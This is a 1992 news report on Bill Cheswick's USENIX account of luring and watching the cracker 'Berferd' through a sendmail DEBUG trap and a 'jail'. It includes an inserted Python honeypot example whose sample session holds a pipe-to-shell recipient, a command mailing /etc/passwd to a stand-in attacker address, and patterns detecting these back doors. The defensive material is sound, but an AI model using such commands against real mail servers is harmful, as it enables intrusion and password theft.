David G. Wiseman

Catching Crackers

SAN FRANCISCO, CALIFORNIA, U.S.A., 1992 JAN 30 (NB) -- At the last Usenix 
conference, Bill Cheswick of AT&T Bell Labs announced to the world that 
he had a secure Internet gateway, and while he didn't invite people to 
try to attack it, he knew that it would happen sooner or later.

Cheswick described what happened while presenting a paper at the 1992
Winter USENIX conference, a technical conference that took place in parallel
with the UniForum trade show in San Francisco last week.

In order to find out if people were doing anything to the gateway to
AT&T's computer network, Cheswick laid a number of traps and connected
electronic alarms to them so that he'd know when somebody was attempting
something out of the ordinary.

Cheswick's alarms looked for attempts to use old security holes that had
become well known to the system-cracking community -- in particular the
DEBUG command of the sendmail electronic mail program, one of the entry
points used by Robert Morris' famous "Internet Worm" several years ago.

In this case, exactly such an attempt was made on Jan 15, 1991, the night
of the air attack on Iraq. Cheswick was torn from his TV to look at logs
of an attempt to break the mailer and sneak into AT&T's computers. He
"wondered idly if Saddam had hired a cracker or two."

Cheswick arranged to respond manually to these attempts, rather than having
the computer respond. With this, he was able to simulate success for
the intruder. These simulations got more and more involved as the days
progressed. Cheswick convinced the cracker, who went by the name of
"Berferd," that commands sent to the mail debugger were batched and
processed only a few times a day.
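The two ideas in the preceding paragraphs, an alarm that fires on the old mailer back door and a reply that lets the intruder believe the hole is real, can be shown in a few dozen lines. The block below is an added example, not code from the article or from Cheswick's paper: it parses SMTP command lines (no network code), raises an alarm on the DEBUG/WIZ commands and on a pipe-to-shell recipient address, and answers the way a vulnerable server of the period would have. The session transcript, hostnames and addresses are constructed for the example; the "200 Debug set" reply is the one the old sendmail gave, and the "batched" wording is the cover story from the text.

```python
"""Toy SMTP-command "alarm" in the spirit of Cheswick's mailer trap.

Added example, not code from the original article or from Cheswick's paper.
It does not speak TCP; it parses SMTP command lines one at a time, raises
an alarm on the old sendmail DEBUG/WIZ back doors and on pipe-to-shell
recipients, and replies as a vulnerable server would so the intruder
believes the trap is a real hole.
"""
import re
from dataclasses import dataclass, field

# Constructed transcript, shaped like the 1991 attempt: the intruder
# enables DEBUG and tries to mail the password file to himself by using
# a shell pipe as the recipient address. Hostname/address are made up.
SAMPLE_SESSION = [
    "HELO cracker.example",
    "DEBUG",
    "MAIL FROM:</dev/null>",
    'RCPT TO:<"|sed \'1,/^$/d\' | /bin/sh; exit 0">',
    "DATA",
    "cat /etc/passwd | mail cracker@example.net",
    ".",
    "QUIT",
]

BACKDOOR_COMMANDS = {"DEBUG", "WIZ"}
# A recipient that is a pipe, i.e. a program to run rather than a mailbox.
PIPE_RECIPIENT = re.compile(r'^RCPT\s+TO:\s*<?\s*"?\|', re.IGNORECASE)


@dataclass
class Alarm:
    kind: str
    line: str


@dataclass
class SmtpTrap:
    alarms: list = field(default_factory=list)
    in_data: bool = False
    debug_on: bool = False

    def handle(self, line: str) -> str:
        """Return the reply a real (vulnerable) sendmail would have given."""
        if self.in_data:
            if line == ".":
                self.in_data = False
                # "Batched" processing was the cover story for slow,
                # manually produced replies.
                return "250 Ok: queued, will be processed in next batch"
            if self.debug_on:
                # Body lines after DEBUG are the commands the intruder
                # expects the shell recipient to run: log them as alarms.
                self.alarms.append(Alarm("shell-command", line))
            return ""                       # no reply inside DATA
        verb = line.split(None, 1)[0].upper() if line.strip() else ""
        if verb in BACKDOOR_COMMANDS:
            self.debug_on = True
            self.alarms.append(Alarm("backdoor-command", line))
            return "200 Debug set"          # what old sendmail really said
        if PIPE_RECIPIENT.match(line):
            self.alarms.append(Alarm("pipe-recipient", line))
            return "250 Recipient ok"       # pretend it worked
        if verb == "HELO":
            return "250 hello"
        if verb == "MAIL":
            return "250 Sender ok"
        if verb == "RCPT":
            return "250 Recipient ok"
        if verb == "DATA":
            self.in_data = True
            return '354 Enter mail, end with "." on a line by itself'
        if verb == "QUIT":
            return "221 closing connection"
        return "500 Command unrecognized"


def run_session(lines):
    """Feed a whole session; return (replies, alarm kinds) for inspection."""
    trap = SmtpTrap()
    replies = [trap.handle(line) for line in lines]
    return replies, [a.kind for a in trap.alarms]


if __name__ == "__main__":
    replies, kinds = run_session(SAMPLE_SESSION)
    for cmd, rep in zip(SAMPLE_SESSION, replies):
        print(f"C: {cmd}\nS: {rep}")
    print("alarms:", kinds)
```

Running it on the constructed session produces three alarms (the DEBUG command, the pipe recipient, and the command in the message body) while every reply looks like success to the sender; an ordinary HELO/MAIL/RCPT/QUIT exchange produces none.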

In spite of an amazing series of dubious assumptions, the scheme worked,
and soon Cheswick got to play the computer to the break-in artist. The
cracker was using a stolen account at Stanford, which he dialed into over
overseas long-distance lines. (Cheswick considered briefly asking other
AT&T staff to trace the call if it was going over their network, but
reported that the company is actually quite protective of such information --
a policy he agrees with.)

The next week, Cheswick attended the Usenix conference in Dallas. From
there, using the network terminal room, he was able to simulate the slow
execution of the attacker's commands from halfway across the country, with
the aid of excited onlookers.

Eventually he constructed what he calls a "jail" (or "roach motel") -- a
dummy system in a special compartment of his interface computer that the
cracker could play in while being observed. Many logs of the cracker's
attempts were kept at Stanford, AT&T and other sites under attack.

"Berferd" was eventually traced to the Netherlands, where the hunt was slowed
by the lack of laws to deal with computer intrusion there. Reportedly,
the attacks eventually stopped when "somebody called his mother and
explained the situation."

Cheswick has suggested that standard programs be shipped with such alarms
in place as a deterrent to system cracking efforts.
